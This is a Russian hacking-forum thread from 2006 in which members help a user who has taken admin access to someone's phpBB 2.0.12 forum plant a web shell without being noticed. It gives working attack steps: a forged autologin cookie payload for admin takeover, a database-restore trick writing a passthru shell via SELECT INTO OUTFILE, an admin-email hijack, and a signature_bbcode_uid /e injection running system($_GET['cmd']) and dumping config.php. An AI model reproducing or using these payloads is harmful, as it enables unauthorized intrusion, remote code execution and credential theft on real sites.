Форумы Способы заливки шелла в phpBB 2.0.12

Discussion in 'Уязвимости CMS/форумов' started by DimaHbl4, 10 Jun 2006.

  1. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Получил права админа подменой кукисов, и че дальше сделать? База не сливается, не одна известная иньекция не помогает которые я пробывал, ни один сплойт с удаленными командами не работает. Люди скажите хотя бы как мне получить хеш админа? Или посоветуйте какой-нить сплойт? А может можно какими-то обходными путями залить шелл?
     
  2. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,151
    Reputations:
    430
    Может, чуть-чуть подробнее ситуацию опишешь, какой форум... и т.д...
     
  3. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    phpbb 2.0.12, че еще подробнее? Именно?
     
  4. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    хы, если кукисы=пасс от админки в мд5, то еще что-то сделать можно. но похоже это не так, т.е тебе нужно достать настоящий пасс.. мде, почему то именно сейчас в голову пришла неплохая мысль.. :p берешь в профайле меняешь мыло админа на свое, и ретривишь пароль на то мыло, которое указал.. ы черт, чтож я раньше не допер :D мыло админа только не забудь записать, чтоб обратно поменять.. жаль что пасс обратно нельзя будет поставить (например, если ипб, то с помощью бд хоть и сам хеш вставишь, а соль фигушки)..
     
    _________________________
  5. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,151
    Reputations:
    430
    нет...погоди...так, а ты непробовал шелл залить или "сделать его"... ну типа в админке есть меню, я уж не помню, типа сохранить БД, вот сохраняешь её... открываешь блокнотом, или лучше Bredo'm и исчешь вот это:
    INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', 'test', '10');
    Если нашёл, то заменяешь вот на это...
    INSERT INTO phpbb_categories (cat_id, cat_title, cat_order) VALUES('1', '<? passthru("$cmd"); ?>', '10');
    SELECT cat_title INTO OUTFILE '/home/test2.ru/www/phpbb/images/avatars/shell.php' FROM phpbb_categories where cat_id=1;
    UPDATE phpbb_categories SET cat_title='test'WHERE cat_id=1;
    А потом из этого же меню в админке востанавливаешь БД и указываешь путь к только, что исправленной БД.
    Этот путь которой указан выше, от случая к случаю...
    там будет осоздан обычный шелл...а там обращаешь с нему с просьбой выпонить тебе команду....вот и всё...
     
    #5 Ch3ck, 11 Jun 2006
    Last edited: 11 Jun 2006
  6. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    c411k А ты уверен что он мне его пасс вышлет? Я так уже думал, если он новый сгенерирует, то че делать? Впалюсь.
     
  7. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Dr.Check Я же написал что базу слить не могу....
     
  8. c411k

    c411k Members of Antichat

    Joined:
    16 Jul 2005
    Messages:
    550
    Likes Received:
    675
    Reputations:
    704
    ну так новый сгенерит и пох. зато будет админка. ты потом вбей какой нибудь default pass вбей, но мыло ему обратно смени, чтоб мог се восстановить. ну я ж писал что палево, зато работает ))
     
    _________________________
  9. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    c411k А мне палево не надо, тогда он везде пасс сменить, и шеллы начнет искать, и баста карапузики ;) Все нужно делать тихо.....
     
  10. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,151
    Reputations:
    430
    и загрузить тоже не чего нельзя чтоль?
     
  11. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Dr.Check Это phpbb Че ты в него загрузишь? ТОчнее через что? Думаешь если бы все так просто, я бы обратился.
     
    #11 DimaHbl4, 11 Jun 2006
    Last edited: 11 Jun 2006
  12. k1b0rg

    k1b0rg Тут может быть ваша реклама.

    Joined:
    30 Jul 2005
    Messages:
    1,182
    Likes Received:
    399
    Reputations:
    479
    в phpbb можно исполнять команды, алгоритм хеширования: md5()
    хрен ли вам не хватает получить админа?
     
  13. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Каким образом мне хещ достать?
     
  14. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,151
    Reputations:
    430
  15. Ch3ck

    Ch3ck Elder - Старейшина

    Joined:
    9 Jun 2006
    Messages:
    1,363
    Likes Received:
    1,151
    Reputations:
    430
    Кстати, так ты админку типо вот так захватил?
    Вместо своих кукисов подставил вот это?:
    Exploit:
    a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D Если, да то я вообще не понимаю...там сразу давается нормальная рабочая админка...
     
  16. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Я пробывал этот эксплойт. Пишет Exploit_Failed. Я до тучи эксплотиов пробывал все не помогают....
     
  17. DimaHbl4

    DimaHbl4 Elder - Старейшина

    Joined:
    9 May 2006
    Messages:
    234
    Likes Received:
    27
    Reputations:
    11
    Войдя под админом, при помощи заменой cookies идем в профиль.
    Пришли?:) Дальше открываем исходный текст страницы и находим:
    <form action="profile.php" method="post">
    дописываем после profile.php такие строки ?signature_bbcode_uid=(.*)/e%00
    ИТого должно получится
    <form action="profile.php?signature_bbcode_uid=(.*)/e%00" method="post">

    Обновляем страницу.......

    И в подписе прописываем
    [b:file_get_contents($_GET[bb])
    В это место можно, естественно, вставить любой php-код, в том числе и system($_GET['cmd']).

    Тыкаем СОхранить или ОТправить.
    Идем по ссылке
    http://www.someserver.ru/forum/profile.php?mode=editprofile&bb=config.php

    Смотри в подпись и БИНГО..... Содержимое config.php .
    ДАльше делаем что хотим. (с) журнал ХАКЕР

    Спасибо особенное Dr.Check'у.
     
    1 person likes this.
Loading...